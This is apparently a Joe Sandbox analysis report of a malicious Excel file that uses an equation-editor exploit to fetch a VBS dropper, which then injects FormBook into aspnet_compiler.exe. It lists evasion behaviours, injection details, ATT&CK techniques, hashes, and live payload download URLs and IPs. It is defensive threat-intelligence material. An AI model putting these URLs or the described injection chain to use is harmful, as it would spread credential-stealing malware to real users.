          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 4080Thread sleep count: 6658 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 4080Thread sleep count: 418 > 30Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 4076Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 4032Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 2948Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00810101 rdtsc 13_2_00810101
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007C07AC NtCreateMutant,LdrInitializeThunk,13_2_007C07AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_007D26F8 mov eax, dword ptr fs:[00000030h]13_2_007D26F8
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Allocates memory in foreign processes
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethedifferentofpicture.vbs" Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_executable.exeQueries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformationJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.541823039.00000000004C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.541811360.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information121
          Scripting          		Valid Accounts33
          Exploitation for Client Execution          		121
          Scripting          		311
          Process Injection          		1
          Masquerading          		OS Credential Dumping12
          Security Software Discovery          		Remote Services11
          Archive Collected Data          		11
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media4
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)41
          Virtualization/Sandbox Evasion          		Security Account Manager41
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
          Obfuscated Files or Information          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync13
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520386 Sample: QT2Q1292.xla.xlsx Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 43 strmr.co 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for dropped file 2->57 59 12 other signatures 2->59 9 EXCEL.EXE 29 35 2->9         started        signatures3 process4 dnsIp5 47 strmr.co 104.21.64.88, 443, 49163, 49165 CLOUDFLARENETUS United States 9->47 49 185.235.137.223, 49164, 49171, 49172 AFRARASAIR Iran (ISLAMIC Republic Of) 9->49 33 C:\Users\user\Desktop\~$QT2Q1292.xla.xlsx, data 9->33 dropped 13 WINWORD.EXE 345 37 9->13         started        18 wscript.exe 2 9->18         started        file6 process7 dnsIp8 51 strmr.co 13->51 35 C:\Users\user\AppData\...\strmr.co.url, MS 13->35 dropped 37 C:\Users\user\AppData\Roaming\...\Bg7UYE.url, MS 13->37 dropped 39 ~WRF{081357E4-4C85...C-01EDA5DDF893}.tmp, Composite 13->39 dropped 73 Microsoft Office launches external ms-search protocol handler (WebDAV) 13->73 75 Office viewer loads remote template 13->75 77 Microsoft Office drops suspicious files 13->77 20 EQNEDT32.EXE 12 13->20         started        41 C:\Users\user\AppData\...\temp_executable.exe, PE32 18->41 dropped 79 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->79 24 temp_executable.exe 12 2 18->24         started        file9 signatures10 process11 dnsIp12 29 C:\Users\...\seethedifferentofpicture.vbs, ASCII 20->29 dropped 31 C:\Users\...\seethedifferentofpicture[1].vbs, ASCII 20->31 dropped 61 Office equation editor establishes network connection 20->61 63 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 20->63 45 dl.zerotheme.ir 185.18.213.20, 443, 49173, 49174 SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR Iran (ISLAMIC Republic Of) 24->45 65 Multi AV Scanner detection for dropped file 24->65 67 Machine Learning detection for dropped file 24->67 69 Writes to foreign memory regions 24->69 71 2 other signatures 24->71 27 aspnet_compiler.exe 24->27         started        file13 signatures14 process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          QT2Q1292.xla.xlsx29%ReversingLabsWin32.Exploit.CVE-2017-0199
          QT2Q1292.xla.xlsx100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{081357E4-4C85-4436-B3DC-01EDA5DDF893}.tmp100%AviraEXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Temp\temp_executable.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\temp_executable.exe21%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://ocsp.entrust.net030%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          dl.zerotheme.ir
          		185.18.213.20
          		truetrue
            		unknown
            strmr.co
            		104.21.64.88
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exetrue
                		unknown
                http://185.235.137.223/90/ni/veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof.doctrue
                  		unknown
                  https://strmr.co/Bg7UYEfalse
                    		unknown
                    https://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dlltrue
                      		unknown
                      http://185.235.137.223/90/seethedifferentofpicture.vbstrue
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://strmr.co/Bg7UYEyX~DF548A65E297CEF6BA.TMP.0.dr, 0DE30000.0.drfalse
                          		unknown
                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://crl.entrust.net/server1.crl0temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://dl.zerotheme.ir/kokorila/cgl-bin/bin.exebhttps://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dlltemp_executable.exe, 0000000C.00000002.536992954.000000000259F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536992954.0000000002614000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536992954.000000000261D000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://ocsp.entrust.net03temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://185.235.137.223/90/seethedifferentofpicture.vbsPEQNEDT32.EXE, 0000000A.00000003.512889309.0000000000358000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://dl.zerotheme.irXtemp_executable.exe, 0000000C.00000002.536992954.000000000263B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://strmr.co/strmr.co.url.4.drfalse
                                      		unknown
                                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.diginotar.nl/cps/pkioverheid0temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://dl.zerotheme.irtemp_executable.exe, 0000000C.00000002.536992954.000000000267F000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe, 0000000C.00000002.536992954.000000000261D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://185.235.137.223/90/seethedifferentofpicture.vbsjEQNEDT32.EXE, 0000000A.00000002.513586832.00000000002E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://ocsp.entrust.net0Dtemp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nametemp_executable.exe, 0000000C.00000002.536992954.000000000261D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://secure.comodo.com/CPS0temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://crl.entrust.net/2048ca.crl0temp_executable.exe, 0000000C.00000002.536857436.00000000006A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://dl.zerotheme.irtemp_executable.exe, 0000000C.00000002.536992954.000000000263B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    185.235.137.223
                                                    		unknownIran (ISLAMIC Republic Of)
                                                    		202391AFRARASAIRtrue
                                                    185.18.213.20
                                                    		dl.zerotheme.irIran (ISLAMIC Republic Of)
                                                    		44285SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIRtrue
                                                    104.21.64.88
                                                    		strmr.coUnited States
                                                    		13335CLOUDFLARENETUStrue

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1520386
                                                    Start date and time:2024-09-27 10:25:28 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 16s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:15
                                                    Number of new started drivers analysed:1
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • GSI enabled (VBA)
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:QT2Q1292.xla.xlsx
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winXLSX@9/24@9/3
                                                    EGA Information:
                                                    • Successful, ratio: 66.7%
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 32
                                                    • Number of non-executed functions: 53
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .xlsx
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Active ActiveX Object
                                                    • Active ActiveX Object
                                                    • Scroll down
                                                    • Close Viewer

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
                                                    • Execution Graph export aborted for target EQNEDT32.EXE, PID 3860 because there are no executed function
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    • VT rate limit hit for: QT2Q1292.xla.xlsx

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    04:27:33API Interceptor40x Sleep call for process: EQNEDT32.EXE modified
                                                    04:27:35API Interceptor98x Sleep call for process: wscript.exe modified
                                                    04:27:38API Interceptor103x Sleep call for process: temp_executable.exe modified
                                                    04:27:47API Interceptor3x Sleep call for process: aspnet_compiler.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    185.235.137.223RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                    • 185.235.137.223/200/NRSCER.txt
                                                    buttersmoothcrashcandy.rtfGet hashmaliciousUnknownBrowse
                                                    • 185.235.137.223/69/shoppingfestivalsessiononherewithyou.tIF
                                                    104.21.64.88Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                      https://tamilblasters.casa/Get hashmaliciousUnknownBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        strmr.coPurchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                        • 104.21.64.88
                                                        Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                        • 172.67.179.215

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AFRARASAIRRFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                        • 185.235.137.223
                                                        buttersmoothcrashcandy.rtfGet hashmaliciousUnknownBrowse
                                                        • 185.235.137.223
                                                        SecuriteInfo.com.Linux.Siggen.9999.15938.22369.elfGet hashmaliciousMiraiBrowse
                                                        • 185.49.104.3
                                                        an3gpDV7uW.exeGet hashmaliciousLummaCBrowse
                                                        • 185.235.137.54
                                                        paTWrNAira.exeGet hashmaliciousLummaCBrowse
                                                        • 185.235.137.54
                                                        2gQsoHaGEm.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                        • 185.235.137.54
                                                        xvJv1BpknZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                        • 185.235.137.54
                                                        PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                        • 185.235.137.54
                                                        TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                        • 185.235.137.54
                                                        Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                                        • 185.235.137.54
                                                        CLOUDFLARENETUShttps://bgbonline.cecchinatoonline.top/Get hashmaliciousHtmlDropperBrowse
                                                        • 188.114.96.3
                                                        QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                        • 188.114.96.3
                                                        Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                        • 104.21.64.88
                                                        0UB3FIL25c.exeGet hashmaliciousLummaCBrowse
                                                        • 172.67.222.194
                                                        Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                        • 172.67.179.215
                                                        Purchase order.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 172.67.74.152
                                                        http://aucution-addopenandmaking81.s3-website.us-east-2.amazonaws.com/Get hashmaliciousHTMLPhisherBrowse
                                                        • 188.114.96.3
                                                        https://jbrizuelablplegal.taplink.ws/Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.19.229.21
                                                        https://sothebys.us.com/4RAoTxB4GI1Anz01wI1Achm3T2APW4Q3E4RAha4RA4DCm3TB4G4RAaunz01coTxq01Get hashmaliciousHTMLPhisherBrowse
                                                        • 104.21.67.142
                                                        SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIRhttps://monogogo.info/JQJMLAWN#em=npaladino@bigge.comGet hashmaliciousPhisherBrowse
                                                        • 45.140.247.113
                                                        qD7cj0t7Ag.elfGet hashmaliciousMirai, MoobotBrowse
                                                        • 45.140.242.232
                                                        mDjOa15q8T.elfGet hashmaliciousMiraiBrowse
                                                        • 45.140.241.81
                                                        NiAsQEhh9p.elfGet hashmaliciousMiraiBrowse
                                                        • 45.156.181.90
                                                        enEQvjUlGl.elfGet hashmaliciousMiraiBrowse
                                                        • 45.140.241.74
                                                        InLf78j8qW.elfGet hashmaliciousMiraiBrowse
                                                        • 45.140.242.215
                                                        4KXNneQz0d.elfGet hashmaliciousUnknownBrowse
                                                        • 185.182.248.108
                                                        hAs0X5MYKz.elfGet hashmaliciousMiraiBrowse
                                                        • 45.140.242.239
                                                        xbcp1b1Dph.elfGet hashmaliciousMiraiBrowse
                                                        • 45.156.193.94
                                                        3VNmL4P4sG.elfGet hashmaliciousMiraiBrowse
                                                        • 45.140.241.91

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        05af1f5ca1b87cc9cc9b25185115607dREMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.64.88
                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                        • 104.21.64.88
                                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 104.21.64.88
                                                        Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.64.88
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.64.88
                                                        Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.64.88
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.64.88
                                                        BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 104.21.64.88
                                                        Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 104.21.64.88
                                                        1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 104.21.64.88
                                                        7dcce5b76c8b17472d024758970a406bREMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                        • 104.21.64.88
                                                        Purchase Inquiry-0012.xlsGet hashmaliciousUnknownBrowse
                                                        • 104.21.64.88
                                                        E-BILL#226.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        • 104.21.64.88
                                                        E-BILL#226.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        • 104.21.64.88
                                                        DHL Receipt_AWB811070484778.xlsGet hashmaliciousUnknownBrowse
                                                        • 104.21.64.88
                                                        BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 104.21.64.88
                                                        AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                        • 104.21.64.88
                                                        RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 104.21.64.88
                                                        TT4729920DBO.xlsGet hashmaliciousRemcosBrowse
                                                        • 104.21.64.88
                                                        NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                                                        • 104.21.64.88
                                                        36f7277af969a6947a61ae0b815907a1Payment Details.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 185.18.213.20
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 185.18.213.20
                                                        Payment Slip.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 185.18.213.20
                                                        Thyssenkrupp PO040232.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 185.18.213.20
                                                        BANK PAYMENT COPY.docGet hashmaliciousXWormBrowse
                                                        • 185.18.213.20
                                                        14bnOjMV2N.docGet hashmaliciousUnknownBrowse
                                                        • 185.18.213.20
                                                        6b58b6.msiGet hashmaliciousPureLog StealerBrowse
                                                        • 185.18.213.20
                                                        RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                        • 185.18.213.20
                                                        RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                                        • 185.18.213.20
                                                        SWIFT DETAILS-ERROR.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 185.18.213.20

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):131072
                                                        Entropy (8bit):0.02566653274851145
                                                        Encrypted:false
                                                        SSDEEP:6:I3DPc1i09hvxggLRzCip8sFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPkiiNfrp9bvYg3J/
                                                        MD5:09CE1A9B707022FF6386E8EC1B8FDABF
                                                        SHA1:2CAA2F3B7C000963DEF058CE14B870BCC5C66F23
                                                        SHA-256:267028E1CC86E8A7453245D68CD52DA98AAD39A03654DE09D01956D268690CA3
                                                        SHA-512:F781F7D3EBC0FC1B8BBA4ED932773AAD1B4A4E13814EFC95372BE0C7AF706DA8EFEA699F6E24426DE718420D7D1A94FDF5AF9ED69A96C2A79852DD13D4A9607E
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......M.eFy...z..8..H..s-e.oS,...X.F...Fa.q............................d..y.N...tpq..........,I..C...@a........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof[1].doc

                                                        Download File
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:Rich Text Format data, version 1
                                                        Category:dropped
                                                        Size (bytes):108966
                                                        Entropy (8bit):2.8471901685936154
                                                        Encrypted:false
                                                        SSDEEP:768:DdO5Q5s3pz7p3S2b9dbk4bSI+GdepBlMNIbnq8dEK7wC5Sbcif4:DwaGj9BjjdepBCNIbnfEGMbn4
                                                        MD5:D805F910E1756735E34523281088F2ED
                                                        SHA1:243F7B70A0FDE02F3AFD3B7D2FE99A786CB505DB
                                                        SHA-256:D43CC5A3D193C33295A70F6861EE2D0DDBEEB165AB106018F06A38CC5297EB57
                                                        SHA-512:37C6EDC231148AF4C65C77412F7672D12EC8504B3FB35BF6581E7A3405242A21D302AF97C6B898312750D8938D8C4B83299DC746A284F5F90E2B8E5B7CBA807F
                                                        Malicious:false
                                                        Yara Hits:
                                                        • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\veryniceprojectwithgreatthingstobeonlineforentirenicewordwitheveryonetoetmenicethingstogetmebackwithnewpersontobegreat______seetheniceworldof[1].doc, Author: ditekSHen
                                                        Reputation:low
